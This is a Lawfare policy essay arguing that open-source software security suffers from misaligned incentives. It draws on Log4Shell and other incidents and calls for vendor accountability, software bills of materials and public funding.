Open-Source Security: How Digital Infrastructure Is Built on a House of Cards

Chinmayi Sharma
Monday, July 25, 2022, 8:01 AM

Log4Shell remains a national concern because the open-source community cannot continue to shoulder the responsibility of securing this critical asset and vendors are not exercising due care in incorporating open-source components into their products. A comprehensive institutional response to the incentives problem is needed. 

("Hackers (pt. 2)" by Ifrah Yousuf is licensed under CC BY 4.0 (https://cybervisuals.org/visual/hackers-pt-2//https://creativecommons.org/licenses/by/4.0/)

Published by The Lawfare Institute
in Cooperation With
Brookings

Editor's note: An expanded version of this article is now available in the North Carolina Law Review with the title "Tragedy of the Digital Commons." In it, the author captures the ongoing developments in the open-source security space and a deeper analysis of its underlying problems. The author concludes that that this is not an open source problem—it is a tragedy of the commons problem.

Open source is free software built collaboratively by a community of developers, often volunteers, for public use. Google, iPhones, the national power grid, surgical operating rooms, baby monitors, and military databases all run on this unique asset. 

However, open source has an urgent security problem. Open source is more ubiquitous and susceptible to persistent threats than ever before. Proprietary software has responded to threats by implementing thorough institutional security measures. The same care is not being given to open-source software—primarily due to misaligned incentives. 

First, open source’s primary beneficiaries—software vendors who profit from its use—are free-riders who lack incentives to contribute to the open-source projects they use. Second, these software vendors also lack incentives to secure the open-source code they use, introducing potentially vulnerable products into the software ecosystem. 

Attempts to address the open-source problem do not go far enough—a comprehensive institutional response to the incentives problem is needed.

Open Source Has a Security Problem

The free and critical software that keeps society online remains at risk. In early July, the Cybersecurity and Infrastructure Security Agency (CISA) and U.S. Coast Guard Cyber Command (CGCYBER) issued a joint cybersecurity advisory. The advisory warned companies that hackers, including state-sponsored advanced persistent threat (APT) actors, continue to exploit organizations that failed to patch the Log4Shell vulnerability, gaining unfettered access to proprietary systems. Just last week, the Cyber Safety Review Board, established by the Biden administration last year to systematically review and learn from cyber incidents, released its first report analyzing the Log4Shell incident and its implications. It echoed CISA’s concern about the vulnerability’s lasting impact on critical system security.

Log4j is Apache’s open-source Java-based error logging library and is used by major companies such as Google and governments alike. The vulnerability in Log4j, called Log4Shell, is said to have existed since 2013. Due to the nature of open source, this one bug, originally discovered in the Minecraft video game, risked taking down networks worldwide. Despite this risk, an April 2022 expert security report found that 60 percent of the nearly 3 billion devices affected by the Log4Shell vulnerability remain unpatched, even though it has been seven months since the vulnerability was discovered. Log4Shell remains a national concern because vendors are not exercising due care in incorporating open-source components into their products.

This lack of due care puts individuals’ data at risk, exposes companies’ intellectual property to theft, and endangers sensitive national security information. CISA Director Jen Easterly called Log4Shell “one of the most serious that I’ve seen in my entire career, if not the most serious.” It had a Common Vulnerability Scoring System Calculator severity score of 10 out of 10. (CVSS v3 is an open framework describing the severity and characteristics of a software vulnerability.) Despite these dire warnings, many companies continue to drag their feet in implementing the free and publicly available patches that would secure their systems against exploits of the vulnerability. 

The Log4Shell vulnerability is not alone: It is just one of a series of vulnerabilities found and exploited in open-source libraries. Most notably, the Equifax hack, which compromised the personal information of nearly 150 million Americans, was courtesy of an unpatched open-source vulnerability. Importantly, the culprit was not the developers of the code but the company that failed to implement a patch that promised to prevent the very thing that happened. Many observers complain that Equifax has suffered little consequence for its negligence, highlighting weak oversight and accountability structures. Just last month, the same type of open-source vulnerability at the root of the Equifax hack was found in popular Atlassian products. The vulnerability has been deemed critical on a severity scale and will impact affected devices “for at least the next couple of years.” 

Open Source and Its Vulnerabilities Are Everywhere 

An April 2022 industry study found that 97 percent of software contains some amount of open source. Open-source code was found in 100 percent of systems related to computer hardware and semiconductors, cybersecurity, energy and clean tech, “Internet of Things” devices, and internet and mobile app software. And it is not a negligible amount of open-source code—78 percent of the code reviewed was open source. Most concerningly, 81 percent of the codebases containing open source had at least one vulnerability, with an average of five high-risk or critical vulnerabilities per application that remain unpatched. 

But, open source’s ubiquity and the characteristics that make it valuable are also what make it a unique risk to digital infrastructure. With proprietary code, or closed software, a vulnerability would impact only that company and its customers. While these threats are still severe (like with SolarWinds), they are outmatched in scope by a vulnerability found in open-source software. When the same piece of code is used by hundreds of thousands of networks internationally, one vulnerability in one project can take countless critical systems offline. 

The solution is not to move away from open source. Freely available software offers numerous public policy benefits—from decreasing barriers to entry to increasing innovation. Simply put, its primary beneficiaries save the cost of developing or purchasing proprietary code by using open source instead, allowing them to invest limited resources in other valuable endeavors. The United States owes its dominance in technological innovation in large part to open-source code.

Moreover, open source is not inherently less secure than proprietary code: 89 percent of information technology executives believe that open source is at least as secure as proprietary code. Source code visibility has not been found to correlate to increased security risks. Rather, it can make projects more stable and secure. Indeed, corporations and government agencies recognize this. They are moving away from relying primarily on proprietary software, or closed-source systems, toward using more open-source code, according to a February RedHat study. Corporations are setting up open-source program offices (OSPO) to coordinate the use of open source and the Department of Defense has a formal policy permitting the use of open source in critical government systems. 

The issue is not the code: It is the lack of institutions securing the code. 

Open Source’s Problems: Resources and Incentives

Open source, like many public goods, suffers a free-rider problem. This resource is free, so anyone can use it. And it is infinitely reproducible, so any number of people can use it simultaneously. This is also technically true of roads and bridges; however, as many of us have personally experienced, roads and bridges are somewhat susceptible to overuse. Overuse, without adequate maintenance, can lead to deterioration, sometimes rendering these resources wholly unusable. Open source also suffers an overuse problem. As projects grow in popularity, support for them needs to ramp up—but that is not happening. 

About 30 percent of open-source projects, including some of the most popular ones, have only one maintainer (a developer tasked with reviewing code contributions, scanning for vulnerabilities, and addressing reported bugs). The 2014 Heartbleed attack—which affected nearly one-fifth of the internet—exploited a vulnerability in an open-source library that was maintained by two full-time developers who were solely responsible for over 500,000 lines of code. If software development resources were allocated optimally, then attacks like Heartbleed and Log4Shell could have been avoided. 

But, as is characteristic of public goods, market participants lack incentives to correct this inefficiency. Companies can profit from open source without expending any resources to improve it. Psychologists call this the bystander effect. When multiple parties have the capacity to solve a problem, each individual party feels less responsibility to take action. Although securing this public good is in every company’s self-interest, very few companies want to be the ones to take on that burden. There is little reason to think the market will correct itself without intervention. 

Researchers have called for targeted investments from government and consumers of open-source projects to fund more full-time maintainers for important projects and entities offering open-source security services for free. The open-source community has requested upstream contributions from its consumers—support in the form of code review and improvement. The open-source community is doing the best it can to maintain the large, critical projects the public relies on. To avoid open-source potholes, its developers need resources for sustained maintenance. Tax dollars fund public roads and bridges. Open source deserves the same support. 

Don’t Forget the Vendor

The weakest link in the software supply chain is the irresponsible software vendor. Even if the open-source community had all the resources it needed, open-source code would remain vulnerable due to poor vendor security practices. Heartbleed is illustrative. The open-source community responded rapidly, developing and distributing a patch on the same day the vulnerability was disclosed. Yet as of July 19, over 41,000 devices remain vulnerable.

Software vendors take open-source code out of the incubator, where it has no real-world effect, and incorporate it into a product they sell to the public. Often, there are several vendors in between the open-source developers building the project and the end users buying the product that uses that project. And vulnerabilities can be introduced at every stage of the supply chain. But they can also be mitigated at every link of the supply chain. 

Why are these open-source vendors so lax about open-source security practices? Because the only way to find an open-source vulnerability is to proactively look for it. Vendors are not similarly limited. They can learn about vulnerabilities in their proprietary code from security researchers, impacted customers, and software vendors contractually obligated to inform their customers about vulnerabilities. They are more likely to lean on these sources than invest in open-source money they could be using to protect their proprietary code. But the same incentives to find and disclose vulnerabilities do not govern open-source code. Unlike proprietary code, open-source code confers no intellectual property benefits to vendors, is not visibly tied to the vendor’s brand or reputation, is not governed by stringent contractual obligations, is not disclosed in contracts, and does not undergo the same rigorous code review. 

Software vendors regularly fail to scan for known and unknown vulnerabilities in the open-source code they use while building their products in the first instance—selling a product whose integrity cannot be assured. They often fail to continue scanning their products for open-source vulnerabilities discovered after the software has been sold. Software is dynamic—while the code in a product may not change, new vulnerabilities are being identified daily, creating an ongoing risk that one’s software can be exploited. The Log4Shell vulnerability illustrated the importance of multiple scans—Log4Shell was not a known vulnerability when vendors first incorporated the code into their products. Only those who scanned again later had a chance to find it.

Finally, some vendors fail to patch their software upon identifying a new vulnerability and provide that patch to affected customers. Even if a vendor scans for new vulnerabilities, it is a separate task to determine which vulnerabilities affect their products. Not all vulnerabilities in an open-source library require urgent fixes, but some do. Some vendors avoid this analysis and instead wait for evidence of their products being impacted before issuing a patch to customers. At that point, it can be too late. CISA has issued guidance recommending a Vulnerability Exploitability eXchange (VEX) document that would be able to inform customers proactively whether the product they were sold contains a vulnerability that requires a patch. These vendors are best suited to find the signal through the noise.

Current Interventions Are Not Enough 

What has been done about this? The question of software security has been on the government’s radar for a while. Since the Log4Shell incident, the Federal Trade Commission (FTC) has threatened companies that are slow to implement patches with enforcement actions. Even before Log4Shell, the White House issued an executive order addressing the software supply chain. The order required those companies selling to the federal government to take precautionary measures to identify and remediate vulnerabilities in software and to provide agency customers with a software bill of materials (SBOM) enumerating the various software components, including open-source components, contained in their products. 

SBOMs are useful. Without them, even the largest, most sophisticated technology companies took weeks to identify where they were vulnerable to attack, let alone patch each of those components. SBOMs specify where a reported vulnerability is in their system, increasing the speed with which they can fix the issue. The Biden administration imposed requirements on federal contractors, many of whom are the largest technology companies, hoping the rest of the industry would feel pressured to follow suit. 

But, SBOMs are insufficient. Thousands of devices remain vulnerable to Log4Shell and companies on average take 98 days to fix a vulnerability. This shows that existing requirements are too little, too late in the software lifecycle. They remain entirely voluntary for companies that do not sell to the federal government. They also do not address the failures of intermediaries who first introduce open-source code into software earlier in the supply chain. SBOM requirements and threats of enforcement actions for failure to patch vulnerabilities will not, on their own, provide necessary institutional oversight on open source. 

An SBOM is simply a list of the ingredients, or codebases, that comprise software you purchased. It does not provide a list of vulnerabilities nor does it impose any minimum security requirements on the vendor generating the SBOM. Comparable to a list of ingredients on a snack or medication you purchase, the information is only as useful as your ability to parse it. 

To operationalize an SBOM, a company must be able to read it, which is a challenge as there is no mandated standard format for an SBOM, and actually use it to check databases such as the National Vulnerability Database (NVD) for new vulnerabilities found in the software components the SBOM lists. These activities are costly and cumbersome. While Google and Intel might have the resources and security maturity to demand machine-readable SBOMs and regularly scan databases for new vulnerabilities that impact their systems, there are countless small businesses using open source that cannot. 

These small businesses are the companies that are driving the numbers such as outstanding critical vulnerabilities and average days to patch. One study found that 43 percent of all cyberattacks target small to medium-sized businesses. These are businesses limited in their ability to respond to a security issue reactively, which underscores the importance of shifting security left and developing more proactive measures.

Therefore, institutions must impose security requirements on software vendors just as those minimum quality requirements imposed on foods and drugs. Smaller, less sophisticated companies are beholden to the information provided by their software vendors, who may or may not be providing them with accurate SBOMs and the timely patches they need to secure their systems. A small business needs to be able to trust its vendor and cannot be expected to recreate the security checks a vendor should be doing.

The liability of any harm caused by an open-source vulnerability should lie with the party most at fault. Currently, software vendors attempt to shift security liability to the open-source maintainer by soliciting certifications of security practices via gargantuan questionnaires. They also attempt to disclaim all warranties on their products, shifting any liability for a defect to the end user. However, when a design or manufacturing defect in a product, such as a car, injures a consumer, the law holds accountable every link in the supply chain capable of having identified and remediated the defect. National Cyber Director Chris Inglis has suggested a similar approach for open source. 

Software vendors are best positioned to know the open-source code their software contains and to remediate vulnerabilities. They are the least cost avoider and reap the greatest monetary reward from these open-source libraries. The only open-source project with no vulnerabilities is the one with no users—by exposing the public to open source, vendors arguably introduce the vulnerability. It thus stands to reason that they should bear responsibility for finding and patching flaws. Minimum standards and accountability structures would expose vendors to liability, thereby motivating them to preemptively invest in better security practices.

Open Source Cannot Do It Alone

The open-source community is aware of its security problem. In fact, the community is already attempting to build out institutions and standards to secure open source. For example, the Open Source Security Foundation, or OpenSSF, has already met with the White House twice and has 10 dedicated workstreams all focused on securing the open-source ecosystem. Companies like Microsoft and Google, large open-source contributors, have pledged $30 million to support OpenSSF’s efforts. The Open Source Technology Improvement Fund (OSTIF) was founded recently to provide free security auditing services to open-source projects and continues to grow.

However, on its own, the open-source community does not have the leverage to demand the resources and minimum security practices required. To preserve its core ethos as a free service and commodity, the open-source community cannot impose conditional requirements on its projects. As a collaborative of many volunteer developers, it also struggles to impose requirements on its own contributors. 

Recently, one of the most popular collections of open-source projects, the Python Package Index (PyPI), announced that it will impose minimum security measures on “critical” projects—the top 1 percent of downloaded projects. This comes out to about 3,500 projects and requires that maintainers of those projects secure their accounts with two-factor authentication to continue contributing to the project. This resulted in an outcry from the community—authors of extremely popular projects threatened to abandon their posts, which could potentially break the systems of any end user reliant on that code.

This development provides three lessons. One, the open-source community recognizes the need to raise minimum security standards. Two, the open-source community, no matter how well-intentioned, cannot accomplish that alone. And three, raising the floor on open-source security will be met with pushback and an exodus from the open-source community. This makes the development of an institutional response even more pressing—critical projects need to remain sufficiently resourced and maintained. 

Protecting a Critical Public Asset 

Open source is at least as important to the economy, public services, and national security as proprietary code, but it lacks the same standards and safeguards. It bears the qualities of a public good and is as indispensable as national highways. Given open source’s value as a public asset, an institutional structure must be built that sustains and secures it. 

This is not a novel idea. Open-source code has been called the “roads and bridges” of the current digital infrastructure that warrants the same “focus and funding.” Eric Brewer of Google explicitly called open-source software “critical infrastructure” in a recent keynote at the Open Source Summit in Austin, Texas. Several nations have adopted regulations that recognize open-source projects as significant public assets and central to their most important systems and services. Germany wants to treat open-source software as a public good and launched a sovereign tech fund to support open-source projects “just as much as bridges and roads,” and not just when a bridge collapses. The European Union adopted a formal open-source strategy that encourages it to “explore opportunities for dedicated support services for open source solutions [it] considers critical.” 

Designing an institutional framework that would secure open source requires addressing adverse incentives, ensuring efficient resource allocation, and imposing minimum standards. But not all open-source projects are made equal. The first step is to identify which projects warrant this heightened level of scrutiny—projects that are critical to society. CISA defines critical infrastructure as industry sectors “so vital to the United States that [its] incapacity or destruction would have a debilitating impact on our physical or economic security or public health or safety.” Efforts should target the open-source projects that share those features. 


Chinmayi Sharma is an Associate Professor at Fordham Law School. Her research and teaching focus on internet governance, platform accountability, cybersecurity, and computer crime/criminal procedure. Before joining academia, Chinmayi worked at Harris, Wiltshire & Grannis LLP, a telecommunications law firm in Washington, D.C., clerked for Chief Judge Michael F. Urbanski of the Western District of Virginia, and co-founded a software development company.

Subscribe to Lawfare